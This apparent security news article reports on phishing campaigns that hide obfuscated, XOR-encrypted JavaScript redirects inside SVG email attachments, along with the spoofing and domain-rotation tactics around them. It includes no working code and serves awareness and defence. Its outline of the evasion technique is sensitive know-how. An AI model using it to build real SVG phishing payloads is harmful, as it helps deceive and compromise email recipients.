Cybersecurity researchers are observing a surge in the abuse of Scalable Vector Graphics (SVG) files as an evasive delivery vector for JavaScript-driven redirects, marking a significant evolution in phishing tactics.
Traditionally perceived as benign image formats, SVG files are being cleverly weaponized by adversaries who embed obfuscated JavaScript within their structure, allowing malicious actions to be triggered upon rendering in a browser.
Campaigns have prominently featured phishing lures with themes such as “ToDoList,” “Missed Call,” and “Payment,” but the underlying technical manipulation remains consistent: concealment of redirection logic within the SVG file.
Phishing Campaigns Turn to SVGs
Attackers are leveraging the SVG format’s ability to house executable script elements inside <script><![CDATA[...]]></script> blocks.
This technical advantage is compounded by the use of JavaScript’satob() function for Base64 decoding and Function() constructor for runtime execution.
Attackers embed XOR-encrypted secondary payloads, which are decrypted in the browser, constructing and executing malicious redirects via. window.location.href.
Notably, these redirects point to attacker-controlled infrastructure, with unique Base64-encoded tokens attached for victim tracking or correlation.
The meticulous structuring of the JavaScript payloads and their obfuscated, multi-stage delivery allows the attack to exploit trusted browser functions while flying beneath the radar of most traditional email security and endpoint defense tools.
The SVG files are deployed through carefully crafted phishing emails. Attackers employ spoofed sender addresses, often exploiting domains lacking proper SPF, DKIM, and DMARC protections.
Many targeted organizations either have no DKIM records or have not set DMARC policies to quarantine or reject suspicious messages, leaving them vulnerable to impersonation.
JavaScript-Based Redirects
Attackers also routinely utilize lookalike domains that mimic legitimate brands, further increasing the credibility of their malicious communications.
Emails associated with this campaign are intentionally sparse, typically comprising little more than the SVG file as an attachment or a link.
The intent is to reduce suspicion while triggering the user to view or interact with the seemingly harmless image, at which point the browser-side JavaScript initiates the silent redirect without requiring further user input.
Further complicating detection, attacker infrastructure makes use of ephemeral domains with randomized or subdomain-based naming conventions, eluding static filtering mechanisms.
According to the Ontinue Report, the campaign infrastructure is often short-lived, with domains rotated regularly to thwart reputation-based blocking.
In many observed incidents, the final landing pages are protected by geofencing, only serving malicious content to visitors from targeted regions, making investigation and takedown efforts even more challenging.
This campaign demonstrates an evolution in phishing methodology, as adversaries pivot from dropping executable malware or malicious archives to leveraging file smuggling techniques, first with HTML and now with SVG.
By embedding obfuscated logic into an image file type trusted by most security systems, attackers circumvent traditional behavioral and signature-based detection.
Unlike previous SVG abuse campaigns, which merely hosted JavaScript payloads or scripts on third-party platforms, these attacks utilize XOR-encrypted scripts directly within the SVG, decoded and executed on the fly, ensuring zero file download footprint and minimizing detection risk.
The primary victims are B2B service providers, including organizations handling corporate, financial, and employee data, as well as SaaS and utility companies—entities that expect frequent inbound email and are therefore susceptible to targeted, minimalistic phishing attempts.
The combination of technical sophistication, social engineering, and infrastructure agility positions this SVG-based attack vector as a particularly potent threat, underscoring the need for organizations to revisit and strengthen their email authentication controls and user awareness training while adopting layered defenses capable of scrutinizing file content beyond superficial signatures.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant updates
